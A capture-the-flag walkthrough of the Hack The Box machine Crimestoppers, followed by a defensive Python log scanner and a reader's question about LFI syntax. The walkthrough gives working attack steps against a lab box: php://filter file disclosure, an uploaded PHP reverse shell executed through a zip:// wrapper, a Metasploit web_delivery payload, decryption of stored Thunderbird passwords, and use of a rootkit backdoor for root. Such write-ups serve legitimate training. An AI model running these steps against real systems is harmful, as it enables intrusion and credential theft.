Hack the Box Challenge: Crimestoppers Walkthrough

Anastasis

Hello friends!! Today we are sharing our experience, which can be helpful in solving a new CTF challenge: Crimestoppers of Hack The Box. Solving this lab is not that easy; all you need is your penetration skill to solve this challenge.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Crimestoppers has IP: 10.10.10.69.

As we know, the initial stage is enumeration; therefore we use an nmap aggressive scan to gather information about the target machine and its running services.

Knowing port 80 was open on the victim’s network, we preferred to explore its IP in the browser, and the following page opened as shown below. Here, we can see that it has two pages, home and upload, but we didn’t find anything suspicious.

So next, we used the dirb tool of Kali to enumerate the directories, found some important directories such as http://10.10.10.80/?op=view, and went to the web browser to explore them.

At upload, you can upload any comment as a Tip, in order to provide some information. So we tried to upload malicious code here but failed each time.

If you observe the URL http://10.10.10.80/?op=upload, you will realize that it looks like LFI.

But it was not that easy to extract information by exploiting LFI with the help of ../etc/password; therefore, making a little more effort and taking help from my previous article, we used the curl command to read the data inside it with the help of PHP base64-encode.

curl http://10.10.10.80/?op=upload =php://filter/convert.base64-encode/resource=upload

As a result, it returns base64-encoded text which we need to decode.

To decode the base64-encoded text, follow the syntax below; we found a PHP script that was pointing toward some kind of token and secretname, which was a link to the uploads directory.

Syntax: echo BASE64TEXT | base64 -d

After struggling a lot, we finally uploaded our PHP backdoor successfully with the help of Burp Suite. Follow the given steps to upload the PHP web shell.

Open php-reverse-shell.php, which is built into Kali Linux at the path /usr/share/webshells/php, modify the ATTACKER’s IP and save this file on the desktop. Here we have renamed it as shell.php and compressed this file.

zip -0 shell.zip shell.php

In order to capture the browser’s request, enter the information for Tip and name, then turn on Burp Suite and click on Send Tip.

Now, in order to upload the content of our PHP backdoor through Burp, select the string “shell” for name = tip as shown below.

And choose the PHP file to paste its content in place of shell.

As you can observe, we have successfully uploaded our malicious PHP content here.

Now forward the intercepted request and you will get the secretname for the uploaded file as highlighted; copy it. Then forward the request again, which will give the success.txt message, and at last forward the request one more time.

Do not forget to launch netcat for reverse connection before executing your uploaded file.

nc -lvp 1234

Now open the browser and execute the following command, which contains the secretname of the uploaded file (PHP backdoor), and you will get a netcat session for the reverse connection.

http://10.10.10.80/?op=zip://uploads/10.10.14.25/e0d7a2f54d16633eb0eddfb10efed8ea5a200274%23shell
python -c 'import pty; pty.spawn("/bin/sh")'

Because we love to work with a meterpreter session, with the help of the Metasploit web_delivery module we generate malicious Python code as shown.

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
msf exploit(multi/script/web_delivery) > exploit

Paste the copied code into netcat, which will provide a meterpreter session inside the Metasploit framework.

HURRAYYYY!!! We got our meterpreter session, now let’s grab the user.txt file first.

Inside the path /home/dom I found the user.txt file and used the cat “filename” command to read this file.

cd home

ls

cd dom

ls

cat user.txt

Great!! We got our 1st flag successfully

Now we need to find the root.txt file to finish this challenge, and believe me, it was not easy until you get the hint which is hidden by the author. We tried every possible method to escalate privileges to gain root access, but it was quite different from the previous ones.

After penetrating more and more, we found “36jinndk.default” inside /home/dom/.thunderbird, which was an encrypted file for a Thunderbird profile; therefore, we downloaded it to our local system.

meterpreter> download 36jinndk.default /root/Desktop/36

Since it was an encrypted file of a Thunderbird profile, with the help of Google we found a Python script at this link for its decryption: https://github.com/unode/firefox_decrypt

With the help of the following command, we successfully found the password: Gummer59

python firefox_decrypt.py /root/Desktop/36

We applied this password to escalate to user dom with the help of the following command and then moved into the crimestoppers.htb directory; it looks like his mailbox directory, where we found many files such as INBOX.

su dom
Password:
cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb

First we looked into INBOX for any hint about root.txt but didn’t find anything related to the root.txt flag; similarly, we opened other files but didn’t find anything.

At last, we open Drafts-1 and read the following line which looks like a hint of root access.

“I don’t trust them and run rkhunter, it reported that there a rootkit installed called:apache_modrootme backdoor” and its execution method.

So we explored the following path and found the access.log.2.gz file; since it was a compressed file, it was better to copy it into /tmp for further steps.

cd /var/log/apache2
cp access.log.2.gz /tmp

Now let’s move inside /tmp to extract the copied file inside it with the help of gunzip.

gunzip access.log.2.gz
ls
cat access.log.2

You can observe the log for a command “FunSociety” which has been executed several times.

As per the message read from DRAFT-1, we run netcat on localhost on port 80 and get root access with the help of the following commands when executed.

nc localhost 80
get FunSociety
get FunSociety
id

Now let’s get the root.txt and finish this task.

cd /root
cat root.txt

BOOOOOM!!!! We hit the Goal and completed both tasks.
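A defender's view of the two web-facing traces this walkthrough leaves in the Apache access log, as an added example that is not part of the original post: PHP stream wrappers (php://, zip://) passed in a query parameter such as op, and request lines that are not valid HTTP, like the FunSociety entries. The log lines are constructed samples, and the names scan, LOG_RE, REQUEST_RE and WRAPPER_RE are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format (not copied from the box).
SAMPLE_LOG = '''\
10.10.14.25 - - [01/Jan/2018:10:00:01 +0000] "GET /?op=home HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.10.14.25 - - [01/Jan/2018:10:00:05 +0000] "GET /?op=php://filter/convert.base64-encode/resource=upload HTTP/1.1" 200 9000 "-" "curl/7.58.0"
10.10.14.25 - - [01/Jan/2018:10:02:11 +0000] "GET /?op=zip://uploads/10.10.14.25/PLACEHOLDER%23shell HTTP/1.1" 200 0 "-" "Mozilla/5.0"
::1 - - [01/Jan/2018:10:05:42 +0000] "get FunSociety" 400 0 "-" "-"
10.10.14.25 - - [01/Jan/2018:10:06:00 +0000] "GET /?op=upload HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
'''

# client, quoted request line, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')
# A well-formed request line: METHOD SP target SP HTTP/x.y
REQUEST_RE = re.compile(r'^[A-Z]+ (\S+) HTTP/\d(?:\.\d)?$')
# A parameter value that starts with a URL-style scheme (php://, zip://, data://, ...)
WRAPPER_RE = re.compile(r'^([a-z][a-z0-9+.-]*)://', re.IGNORECASE)


def scan(log_text):
    """Return (line_number, client, reason) for every suspicious log entry."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        entry = LOG_RE.match(line)
        if not entry:
            continue  # not an access-log line
        client, request, _status = entry.groups()

        req = REQUEST_RE.match(request)
        if not req:
            # Bare keywords on port 80 never form a valid request line.
            findings.append((lineno, client, "malformed request line: %r" % request))
            continue

        # parse_qsl percent-decodes values, so encoded payloads are checked too.
        query = req.group(1).partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            wrapper = WRAPPER_RE.match(value)
            if wrapper:
                reason = "stream wrapper %s:// in parameter %r" % (
                    wrapper.group(1).lower(), name)
                findings.append((lineno, client, reason))
    return findings


if __name__ == "__main__":
    for lineno, client, reason in scan(SAMPLE_LOG):
        print("line %d  %s  %s" % (lineno, client, reason))
```

On a real server the same check belongs next to an allow-list for the op parameter, since a page selector has no legitimate reason to carry a scheme at all.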
Deucalion

In the LFI, by what logic does he put an equals sign "=" after upload?

i.e. ?op=upload='LFI'

and not after op, i.e. ?op='LFI'

In general, in LFI attacks the syntax is index.php?page=LFI
